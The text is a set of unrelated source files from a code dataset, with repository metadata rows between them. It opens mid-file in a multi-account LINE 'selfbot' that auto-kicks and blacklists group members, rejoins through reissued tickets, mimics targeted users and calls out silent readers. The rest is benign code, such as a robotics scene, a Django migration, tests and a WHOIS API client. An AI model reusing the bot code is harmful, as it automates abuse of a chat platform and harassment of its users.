ticket = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kc.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in keMID:
if op.param2 in kcMID:
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = False
ke.updateGroup(G)
ticket = ke.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kc.updateGroup(G)
else:
G = ke.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ke.updateGroup(G)
ticket = ke.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ke.updateGroup(G)
settings["blacklist"][op.param2] = True
except:
pass
#==============================================================================#
if op.type == 17:
if op.param2 not in Family:
if op.param2 in Family:
pass
if RfuProtect["protect"] == True:
if settings["blacklist"][op.param2] == True:
try:
line.kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
except:
try:
line.kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["protect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
random.choice(Rfu).inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["inviteprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["inviteprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["cancelprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["linkprotect"] == True:
settings ["blacklist"][op.param2] = True
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if RfuProtect["autoAdd"] == True:
if (settings["message"] in [""," ","\n",None]):
pass
else:
line.sendMessage(op.param1,str(settings["message"]))
if op.type == 11:
if RfuProtect["linkprotect"] == True:
if op.param2 not in Family:
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param3])
if op.type == 13:
if RfuProtect["Protectguest"] == True:
if op.param2 not in Family:
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 17:
if RfuProtect["Protectjoin"] == True:
if op.param2 not in Family:
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 1:
if sender in Setmain["foto"]:
path = line.downloadObjectMsg(msg_id)
del Setmain["foto"][sender]
line.updateProfilePicture(path)
line.sendMessage(to,"เปลี่ยนรูปภาพเรียบร้อยแล้ว")
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
ki.sendChatChecked(to, msg_id)
kk.sendChatChecked(to, msg_id)
kc.sendChatChecked(to, msg_id)
ke.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if "MENTION" in list(msg.contentMetadata.keys()) != None:
if settings['detectMention'] == True:
contact = line.getContact(msg._from)
cName = contact.displayName
balas = ["\n " + cName ]
ret_ = "" + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in lineMID:
line.sendMessage(to,ret_)
line.sendMessage(to,str(settings["Respontag"]))
#sendMessageWithMention(to, contact.mid)
line.sendMessage(msg.to, None, contentMetadata={"STKID":"405","STKPKGID":"1","STKVER":"100"}, contentType=7)
break
if op.type == 17:
print ("MEMBER JOIN TO GROUP")
if settings["Sd"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendMessage(op.param1,str(settings["welcome"]))
line.sendImageWithURL(op.param1,image)
if op.type == 15:
print ("MEMBER LEAVE TO GROUP")
if settings["Nn"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendImageWithURL(op.param1,image)
line.sendMessage(op.param1,str(settings["bye"]) + "\n\n" + line.getContact(op.param2).displayName)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 55:
try:
if RfuCctv['cyduk'][op.param1]==True:
if op.param1 in RfuCctv['point']:
Name = line.getContact(op.param2).displayName
if Name in RfuCctv['sidermem'][op.param1]:
pass
else:
RfuCctv['sidermem'][op.param1] += "\n" + Name
pref=['แอบอ่านทำไม ทำไมมะออกมาคุยกันละ ']
line.sendMessage(op.param1, str(random.choice(pref))+' '+Name)
else:
pass
else:
pass
except:
pass
if op.type == 55:
try:
if RfuCctv['cyduk'][op.param1]==True:
if op.param1 in RfuCctv['point']:
Name = line.getContact(op.param2).displayName
if Name in RfuCctv['sidermem'][op.param1]:
pass
else:
RfuCctv['sidermem'][op.param1] += "\n " + Name + "\n"
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
line.sendMessage(op.param1, "Nah " +nick[0])
summon(op.param1, [op.param2])
else:
pass
else:
pass
except:
pass
if op.type == 55:
print ("[ 55 ] ")
try:
if op.param1 in read['readPoint']:
if op.param2 in read['readMember'][op.param1]:
pass
else:
read['readMember'][op.param1] += op.param2
read['ROM'][op.param1][op.param2] = op.param2
backupData()
else:
pass
except:
pass
except Exception as error:
logError(error)
#==============================================================================#
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
lineBot(op)
oepoll.setRevision(op.revision)
except Exception as e:
logError(e)
| [
"noreply@github.com"
] | noreply@github.com |
465ad821dd26762dbe90a07f2a9c32c0f4f0758e | a554def1522ab3d58f2a85027f985c01fa159aa2 | /app.py | edb289e677b9c8d5162ac59a9ba0e0c2f82f2976 | [] | no_license | geraldoalm/FirstGit | 389574b287948a7626a1c31115e9124f66f4e80c | ca6c39d54b21a490a09491073753ca0a25c1fbc0 | refs/heads/master | 2020-05-07T18:35:25.688254 | 2019-04-11T11:22:28 | 2019-04-11T11:22:28 | 180,774,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | from calculator import total,product
print("The sum is :",total(2,3))
print("The product is :",product(2,3))
| [
"geraldoalm12345@gmail.com"
] | geraldoalm12345@gmail.com |
5bd6c962c4630dabef0a1ee828ebb0886814655c | a91cb8785be8ba51831b815deb0eb1dd59b9a9a8 | /scene/step.py | c56dba461e5a064169fad65a8f9ec80f3f828a68 | [] | no_license | maxime-tournier/pouf | 137f1917cb6deea21fd75f4767b9fbdbdd4adb39 | afe6ec8d408b3b1b199576106887d3feb12447fc | refs/heads/master | 2021-01-18T23:27:12.598897 | 2016-05-25T13:30:49 | 2016-05-25T13:30:49 | 18,585,362 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,481 | py | import Sofa
import pouf
from pouf import robot
from pouf import rigid
from pouf import joint
from pouf import control
from pouf import script
from pouf import pose
from pouf import contact
from pouf import tool
import Compliant
from Compliant import Tools
from pouf.tool import concat
import math
import numpy as np
path = pouf.path()
class Script:
def __init__(self):
self.balance = None
def onBeginAnimationStep(self, dt):
self.servo.pre_step(dt)
self.balance.update(dt)
self.fsm.step()
return 0
def onEndAnimationStep(self, dt):
self.servo.post_step(dt)
return 0
def reset(self):
self.servo.reset()
self.fsm.start()
return 0
def draw(self):
if self.balance != None:
self.balance.draw()
return 0
class StateMachine:
def __init__(self, balance, cop, com):
self.states = ['start', 'both', 'left', 'right']
self.transitions = [
('always', 'start', 'both'),
('wait', 'both', 'left'),
('wait', 'both', 'right'),
('wait', 'left', 'both'),
('wait', 'right', 'both')
]
self.start = 'start'
self.balance = balance
self.cop = cop
self.com = com
self.H = np.zeros( np.shape(self.cop.matrix) )
self.L = np.zeros( np.shape(self.cop.matrix) )
# transitions
def always(self):
return True
def wait(self):
return self.balance.robot.node.getTime() - self.time > 1
# states
def enter(self):
self.time = self.balance.robot.node.getTime()
def enter_start(self):
self.enter()
def update(self):
u = self.cop.constrained_velocity()
m = self.balance.robot.mass
pouf.control.broyden(self.H, u, self.balance.am);
pouf.control.broyden(self.L, u, m * self.balance.dcom);
def enter_both(self):
self.enter()
def while_both(self):
self.cop.enable( self.balance.centroid != None )
if self.cop.enabled():
self.update()
m = self.balance.robot.mass
# desired cop
cop = self.balance.centroid
s = self.balance.com - cop
current = self.balance.am + np.cross(s, m * self.balance.dcom)
g = self.balance.gravity
lf = pouf.rigid.translation(self.balance.robot.lfoot.node)
rf = pouf.rigid.translation(self.balance.robot.rfoot.node)
mid = 0.5 * (lf + rf)
cop = mid
cop[1] = self.balance.centroid[1]
spring = mid - self.balance.com
spring[1] = 0
f = m * g + spring * 2e3
dt = self.balance.dt
self.cop.matrix = self.H + pouf.tool.hat(s + dt * f).dot(self.L)
self.cop.value = dt * (current + dt * np.cross(s, f))
self.cop.update()
target = np.array( [mid[0], mid[2]] )
# self.com.matrix = self.L
# self.cop.value
def createScene(node):
scene = pouf.tool.scene( node )
num = node.createObject('pouf.pgs',
iterations = 50,
precision = 0)
ode = node.getObject('ode')
# ode.stabilization = True
# ground
ground = pouf.tool.ground(scene)
# robot
robot = pouf.robot.Humanoid('robot')
robot.insert( scene )
# servo
servo = pouf.control.PID(robot)
pouf.pose.setup( servo )
servo.set('pos', pouf.pose.stand() )
# cop control
dofs = [ j.node.getObject('dofs') for j in robot.joints ]
cop = pouf.control.Constraint('constraint', node, dofs, 3)
cop.compliance = 1e1
cop.damping = 0
# com = pouf.control.Constraint('constraint', node, dofs, 2)
# com.compliance = 1e14
# com.damping = 10
# script
script = Script()
pouf.script.insert( node, script )
# balance stuff
balance = pouf.contact.Balance(robot, ground)
for p in servo.pid:
p.ki = 0
# fsm
fsm = pouf.control.FSM( StateMachine(balance, cop, None) )
script.balance = balance
script.robot = robot
script.servo = servo
script.ground = ground
script.fsm = fsm
return 0
| [
"maxime.tournier@brain.riken.jp"
] | maxime.tournier@brain.riken.jp |
adf8bcf70a7abd41c6617653f5ac599ad6aff3cc | f260ff31ba63e9cd35e21b99c577107c46135a0d | /test005/test_reduce.py | 2b49c6ecf3d3ee5062e62b927f5198f055b7b5fd | [] | no_license | wscfan/pythoncode | e1cc882139931f4257528e274f443c3c8217ec8d | 4bbe06f47b046a5078e8dd0f2ae9ccb9eeb01743 | refs/heads/master | 2021-03-20T21:12:58.580056 | 2020-12-19T16:38:10 | 2020-12-19T16:38:10 | 247,234,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from functools import reduce
def get_sum_use_python(l):
return sum(l)
def f(m, n):
return m + n
def get_sum_use_reduce(l):
return reduce(f, l)
def get_sum_use_lambda(l):
return reduce(lambda m, n: m + n,l)
if __name__ == "__main__":
l = [1, 2, 3, 5, 7]
print(get_sum_use_python(l))
print('------------------')
print(get_sum_use_reduce(l))
print('+++++++++++++++++++')
print(get_sum_use_lambda(l)) | [
"wshappyday@sina.com"
] | wshappyday@sina.com |
2a762d43d44142359945b21e58d56b6dea95b604 | 7e30a9a5170bb54897e808785c3daa58c1a3e19b | /sim/utils.py | 92aa4d07f50bb913a20d049cbca7cbf6d33a1659 | [
"MIT"
] | permissive | jmagine/multiuav-rf | 5ab8d80061d368a6f0b92dc62c2c135189270099 | ba9dcb5ca550916873ce68baa71da983f2dd4be5 | refs/heads/master | 2023-01-07T12:43:37.156868 | 2020-11-02T17:12:55 | 2020-11-02T17:12:55 | 226,418,281 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py |
import numpy as np
import math
def calc_rates_fdma(a, q, f, d, I, gt, gamma):
K, M = I.shape
r = np.zeros((K, M))
for n in range(M):
for k in range(K):
pass
pass
def calc_rates(a, q, f, d, I, gt, gamma):
K, M = I.shape
#r_temp = np.zeros((K))
#r_total = np.zeros((M))
#r_total_k = np.zeros((K))
r = np.zeros((K, M))
for freq in f:
#uav_idxs = [idx for idx, fr in enumerate(f) if fr == freq]
uav_idxs = f[freq]
for n in range(M):
for k in uav_idxs:
inner_signal = 1
inner_noise = 1
#inner_signal += gamma * a[k][n]**2 / d[k][k][n]
for j in uav_idxs:
inner_signal += gamma * a[j][n]**2 / d[j][k][n]
if j != k:
inner_noise += gamma * a[j][n]**2 / d[j][k][n]
r[k][n] = math.log(inner_signal, 2) - math.log(inner_noise, 2)
'''
#nth time slot
for n in range(M):
r_total[n] = 0
#kth uav-gt pair
for k in uav_idxs:
#interference over all other uavs for kth pair
r_temp[k] = I[k][n] + gamma * a[k][n]**2 / d[k][k][n]
#calculate rate for kth pair at time n
r_total[n] += math.log(1 + gamma * a[k][n]**2 / d[k][k][n]) - math.log(1 + I[k][n])
r_total_k[k] += math.log(1 + gamma * a[k][n]**2 / d[k][k][n]) - math.log(1 + I[k][n])
#r_total[n] += math.log(1 + r_temp[k]) - math.log(1 + I[k][n])
#r_total_k[k] += math.log(1 + r_temp[k]) - math.log(1 + I[k][n])
'''
#for k in range(K):
# print("[rpq] %d: %.2f" % (k, r_total_k[k]))
'''
for n in range(M):
print("(%d,%.2f)" % (n, np.sum(r, axis=0)[n] * 1.44), end='')
print()
'''
return r
def dist(pos_0, pos_1):
return np.linalg.norm(np.array(pos_0) - np.array(pos_1))
def dist2(pos_0, pos_1, h_min):
p0 = [pos_0[0], pos_0[1], h_min]
p1 = [pos_1[0], pos_1[1], 0]
return np.linalg.norm(np.array(p0) - np.array(p1))
#calculate received signal power in dB
def power_fspl(pw_tx, freq, dist):
if dist <= 0 or freq <= 0:
return pw_tx
loss = 20 * math.log10(4 * math.pi / 300 * freq * dist)
return pw_tx - loss | [
"jasonma5501@gmail.com"
] | jasonma5501@gmail.com |
b5c3ee3c6030d006925a30c43b0ae563408aeda9 | fe6775ca8c5b42710785e3a923974ae079f92c8f | /剑指offer/剑指 Offer 55 - I. 二叉树的深度.py | 53759e4232eb424671a0c80016e248c07bbe847d | [] | no_license | AiZhanghan/Leetcode | 41bda6676fa1a25fa19e393553c1148ed51fdf72 | 101bce2fac8b188a4eb2f5e017293d21ad0ecb21 | refs/heads/master | 2021-06-28T10:48:07.865968 | 2020-11-20T09:45:15 | 2020-11-20T09:45:15 | 188,155,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def maxDepth(self, root):
"""
Args:
root: TreeNode
Return:
int
"""
if not root:
return 0
left_depth = self.maxDepth(root.left)
right_depth = self.maxDepth(root.right)
return max(left_depth, right_depth) + 1 | [
"35103759+AiZhanghan@users.noreply.github.com"
] | 35103759+AiZhanghan@users.noreply.github.com |
4f558c18905639160671530a35dbbf592d71058c | a15200778946f6f181e23373525b02b65c44ce6e | /Algoritmi/2019-06-25/all-CMS-submissions/2019-06-25.10:26:54.215386.VR432075.biancaneve.py | 959fb7d91ea8ff4d2875e8281f77063d1dc829c4 | [] | no_license | alberto-uni/portafoglioVoti_public | db518f4d4e750d25dcb61e41aa3f9ea69aaaf275 | 40c00ab74f641f83b23e06806bfa29c833badef9 | refs/heads/master | 2023-08-29T03:33:06.477640 | 2021-10-08T17:12:31 | 2021-10-08T17:12:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,383 | py | """
* user: VR432075
* fname: BUSATTO
* lname: ALESSANDRO
* task: biancaneve
* score: 2.0
* date: 2019-06-25 10:26:54.215386
"""
from __future__ import print_function
import sys
if sys.version_info<(3,0):
input=raw_input
def scambia(nani,p1,p2):
x=nani[p1-1]
nani[p1-1]=nani[p2-1]
nani[p2-1]=x
def check(nani, h1, h2):
num_nani=h2-h1+1
total=0
y=len(nani)+1
prefix_sum=[0]*y
for i in range(0,y-1):
prefix_sum[i+1]=prefix_sum[i]+nani[i]
for i in range(h1,h2+1):
total += i
i=len(prefix_sum)-1
while i-num_nani >= 0 and prefix_sum[i]>=total:
if(prefix_sum[i]-prefix_sum[i-num_nani]==total):
return 1
i=i-1
return 0
def main():
#r1=input()
#split=r1.split()
#n=int(split[0])
#m=int(split[1])
#disp_nani=input()
#nani=int(disp_nani.split())
n, m = map(int, input().split())
nani = map(int, input().split())
for i in range(0,m):
t, p1, p2 = map(int, input().split())
#r=input()
#r_split=r.split()
#t=int(r_split[0])
#p1=int(r_split[1])
#p2=int(r_split[2])
if t==1:
scambia(nani,p1,p2)
else:
res=check(nani,p1,p2)
if res==1:
print("YES")
else:
print("NO")
if __name__ == '__main__':
main() | [
"romeo.rizzi@univr.it"
] | romeo.rizzi@univr.it |
65d85f49f25191d7cd79893a30280262f4c997df | 6ffd2cb3c32d16d2a4dba3c5e894a62bd96ba0a9 | /posts/migrations/0003_auto_20170717_1753.py | b4acaae8cb8ffc6820d9d53226fc3dae27f1a9a7 | [] | no_license | kruwaih/blog | fe973227678d7da897d9cbca842cab0d54fedcaa | b583786e82806e90ddd116ab8617ae14c1cace47 | refs/heads/master | 2022-12-08T23:23:37.005038 | 2017-08-15T17:57:40 | 2017-08-15T17:57:40 | 98,108,089 | 0 | 1 | null | 2022-12-08T00:42:38 | 2017-07-23T15:42:14 | Python | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-17 17:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0002_secondpost'),
]
operations = [
migrations.RenameField(
model_name='secondpost',
old_name='email',
new_name='email_val',
),
]
| [
"kruwaih@khaleds-MacBook-Pro.local"
] | kruwaih@khaleds-MacBook-Pro.local |
57e67cb1df112ea531e501e57188eaec98f19f3d | 4e2a41ca6d13d3b04bbd7c087094a77a374500fa | /clang-format.py | 6a9828ef51f4268d53079eaa68c7647d54d9ac54 | [] | no_license | bourdibay/Qt-prototypes | 36803054e75e84112a8b6a4b427c257d7a016558 | eb57097cb84925cd55b6e82334a87806af3aaa2e | refs/heads/master | 2021-01-10T19:09:36.742710 | 2014-07-13T09:02:49 | 2014-07-13T09:02:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | # This script run clang-format on all the source files
# in order to share a common and uniform syntax style.
import fnmatch
import os
matches = []
for dir_to_check in ['./ListProto', './ModelSharing', './Scintilla',
'./SideAreaManagement', './TextEditor', './TreeProto']:
for root, dirnames, filenames in os.walk(dir_to_check):
for filename in filenames:
if filename.endswith(('.cpp', '.h', '.hpp')):
matches.append(os.path.join(root, filename))
print "Files to format: {0}".format(matches)
files = ' '.join(matches)
os.system("C:/LLVM/LLVM_Release_Win64/bin/clang-format.exe -i " + files)
print "Done (press Enter to exit)"
raw_input() # to pause the program for Windows
| [
"benjamin.bourdin40@gmail.com"
] | benjamin.bourdin40@gmail.com |
4d6c0ca013275f8ac616c2537d1a06bf1ecfd9dd | fe0813eba877ddebfa3292e8d2db7be3a8d36e64 | /leetcode/bit_operation/137.py | cbece34e139bf8214c38dfbbdad501fc6a8d326d | [
"MIT"
] | permissive | 1lch2/PythonExercise | 409b367101ce5cbcd739c9c312a3d398e5b38811 | 9adbe5fc2bce71f4c09ccf83079c44699c27fce4 | refs/heads/master | 2021-07-18T05:39:42.985221 | 2021-01-15T11:01:19 | 2021-01-15T11:01:19 | 229,878,839 | 1 | 0 | null | 2020-02-21T05:30:28 | 2019-12-24T05:49:16 | Python | UTF-8 | Python | false | false | 995 | py | # 给定一个非空整数数组,除了某个元素只出现一次以外,其余每个元素均出现了三次。找出那个只出现了一次的元素。
# 说明:
# 你的算法应该具有线性时间复杂度。 你可以不使用额外空间(常数空间)来实现吗?
# 示例 1:
# 输入: [2,2,3,2]
# 输出: 3
# 示例 2:
# 输入: [0,1,0,1,0,1,99]
# 输出: 99
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
return (3 * sum(set(nums)) - sum(nums)) // 2
# https://leetcode-cn.com/problems/single-number-ii/solution/single-number-ii-mo-ni-san-jin-zhi-fa-by-jin407891/
class Solution1:
def singleNumber(self, nums: List[int]) -> int:
# 所有位计算规则相同,只对某一位做统计计算
# two, one 分别为状态转移中两个位的值
two, one = 0, 0
for n in nums:
one = (one ^ n) & ~two
two = (two ^ n) & ~one
return one
| [
"1lch2@163.com"
] | 1lch2@163.com |
9f9641fb2004477a918cfa465ea0687a2cfd391c | eaaa1bbceb9a867e08769aae07c37c5e1107e430 | /mitx_6.00.1x_ics_py/examples/lectureCode_Lec5-fib.py | 1825c83576b55e08886bfcd0acf5f707779b8de7 | [] | no_license | nwinds/jugar | c8f9ce11dd95c6e0dda22e22a69dd598b34d9d3c | db4d362d9d1dd04f2c6c013d4462de0c892b8314 | refs/heads/master | 2020-12-24T16:35:03.951580 | 2016-03-10T09:25:06 | 2016-03-10T09:25:06 | 41,397,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | def fib(x):
"""assumes x an int >= 0
returns Fibonacci of x"""
# Base case:
# Female(0) = 1, Female(1) = 1
assert type(x) == int and x >= 0
if x == 0 or x == 1:
return 1
else:
return fib(x-1) + fib(x-2)
| [
"namingwinds@gmail.com"
] | namingwinds@gmail.com |
2d2b43ef2d5afadf787cce63d8514ef29e08e146 | 9977d90d93d5d11f3746dfbc6f80df8446f993ec | /src/users/migrations/0007_auto_20171109_1333.py | 5272b8f597d788b866b306e525296723fbdf3f69 | [] | no_license | murkeirluh/Medical-Center-Manager | 8f38575328c0b1da1c6439d1836c667002f70715 | fa7582673bcf1023f5331972e3d856476ffbf45b | refs/heads/master | 2020-03-15T06:14:06.433680 | 2017-12-05T07:04:32 | 2017-12-05T07:04:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-09 05:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0003_auto_20171109_1327'),
('users', '0006_auto_20171108_1551'),
]
operations = [
migrations.CreateModel(
name='AdministratorProducts',
fields=[
('admin_product_id', models.AutoField(primary_key=True, serialize=False)),
('price', models.FloatField()),
('stock', models.IntegerField()),
('admin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.AdministratorDetails')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dashboard.Product')),
],
),
migrations.AddField(
model_name='administratordetails',
name='products',
field=models.ManyToManyField(through='users.AdministratorProducts', to='dashboard.Product'),
),
]
| [
"gchase.patron@gmail.com"
] | gchase.patron@gmail.com |
a52d697057d4bb0491b592c7413e0b26fe50b949 | a7d79633d0034afcca44920bd050ad36969fcdf2 | /test/test_guard.py | 2d852596a16766308a55be5a4ce8b79093f5b854 | [
"MIT"
] | permissive | s-m-i-t-a/railroad | b59439321745866c0bcc82d3bddba4131f798ed8 | ddb4afa018b8523b5d8c3a86e55388d1ea0ab37c | refs/heads/master | 2020-04-15T16:53:41.159916 | 2016-11-25T13:32:37 | 2016-11-25T13:32:37 | 41,478,581 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | # -*- coding: utf-8 -*-
import pytest
from mock import Mock, call
from railroad import guard, GuardError
def fn(a, b, c, d='foo'):
return (a, b, c, d)
def test_guard_call_guarded_function():
def fn(a):
return a
guarded = guard('a', lambda a: True)(fn)
result = guarded('foo')
assert result == 'foo'
def test_guard_pass_only_selected_paramters_to_guardian():
guardian = Mock()
guarded = guard(['b', 'a'], guardian)(fn)
guarded(1, 2, 3, 4)
assert guardian.called
assert guardian.call_args == call(a=1, b=2)
def test_guard_raise_exception_when_guardian_return_false():
def fn(a):
return a
guarded = guard('a', lambda a: False)(fn)
with pytest.raises(GuardError):
guarded('foo')
def test_guard_raise_custom_exception():
def fn(a):
return a
class MyError(Exception):
pass
guarded = guard('a', lambda a: False, MyError)(fn)
with pytest.raises(MyError):
guarded('foo')
def test_guard_called_with_pramas_as_string():
def fn(a, ab):
return ab
guarded = guard('ab', lambda ab: True)(fn)
result = guarded(1, 'foo')
assert result == 'foo'
def test_combined_guard_call_each_guarded_function():
g1 = Mock()
g2 = Mock()
@guard('a', g1)
@guard('b', g2)
def fn(a, b, c):
return (a, b, c)
fn(1, 2, 3)
assert g1.called
assert g1.call_args == call(a=1)
assert g2.called
assert g2.call_args == call(b=2)
| [
"jsmitka@smita.info"
] | jsmitka@smita.info |
1770ff429817f3ae0b07000ea4ab431db2bb71c9 | ac4e74f42b1e1395da8d7625a081806ec7d7e2dc | /apikey/python/whois.py | faedafdb103f5f6518bf08f57696f8cd19f4d33d | [] | no_license | whois-api-llc/whois | 84866d4d13d9e80674ef98e173470f808c151f12 | acc18f9781754695383b455e792275effe7925aa | refs/heads/master | 2023-05-06T06:58:21.286190 | 2022-06-23T06:24:14 | 2022-06-23T06:24:14 | 113,178,095 | 0 | 1 | null | 2023-04-14T17:39:14 | 2017-12-05T12:16:06 | C# | UTF-8 | Python | false | false | 2,850 | py | try:
# For Python v.3 and later
from urllib.parse import quote
from urllib.request import urlopen, pathname2url
except ImportError:
# For Python v.2
from urllib import pathname2url
from urllib2 import urlopen, quote
import base64
import hashlib
import hmac
import json
import time
username = 'Your whois api username'
api_key = 'Your whois api key'
secret = 'Your whois api secret key'
domains = [
'google.com',
'example.com',
'whoisxmlapi.com',
'twitter.com'
]
url = 'https://whoisxmlapi.com/whoisserver/WhoisService'
def build_request(req_username, req_timestamp, req_digest, req_domain):
data = {
'u': req_username,
't': req_timestamp
}
json_data = json.dumps(data)
js_64 = base64.b64encode(bytearray(json_data.encode('utf-8')))
return '?requestObject=' + pathname2url(js_64.decode('utf-8')) \
+ '&digest=' + pathname2url(req_digest) \
+ '&domainName=' + pathname2url(req_domain) \
+ '&outputFormat=json'
def generate_digest(req_username, req_timestamp, req_key, req_secret):
res_digest = req_username + str(req_timestamp) + req_key
res_hash = hmac.new(bytearray(req_secret.encode('utf-8')),
bytearray(res_digest.encode('utf-8')),
hashlib.md5)
return quote(str(res_hash.hexdigest()))
def generate_params(req_username, req_key, req_secret):
res_timestamp = int(round(time.time() * 1000))
res_digest = generate_digest(req_username, res_timestamp,
req_key, req_secret)
return res_timestamp, res_digest
def print_response(req_response):
response_json = json.loads(req_response)
if 'WhoisRecord' in response_json:
if 'contactEmail' in response_json['WhoisRecord']:
print('Contact Email: ')
print(response_json['WhoisRecord']['contactEmail'])
if 'createdDate' in response_json['WhoisRecord']:
print('Created date: ')
print(response_json['WhoisRecord']['createdDate'])
if 'expiresDate' in response_json['WhoisRecord']:
print('Expires date: ')
print(response_json['WhoisRecord']['expiresDate'])
def request(req_url, req_username, req_timestamp, req_digest, req_domain):
req = build_request(req_username, req_timestamp, req_digest, req_domain)
return urlopen(req_url + req).read().decode('utf8')
timestamp, digest = generate_params(username, api_key, secret)
for domain in domains:
response = request(url, username, timestamp, digest, domain)
if 'Request timeout' in response:
timestamp, digest = generate_params(username, api_key, secret)
response = request(url, username, timestamp, digest, domain)
print_response(response)
print('---------------------------\n')
| [
"support@whoisxmlapi.com"
] | support@whoisxmlapi.com |
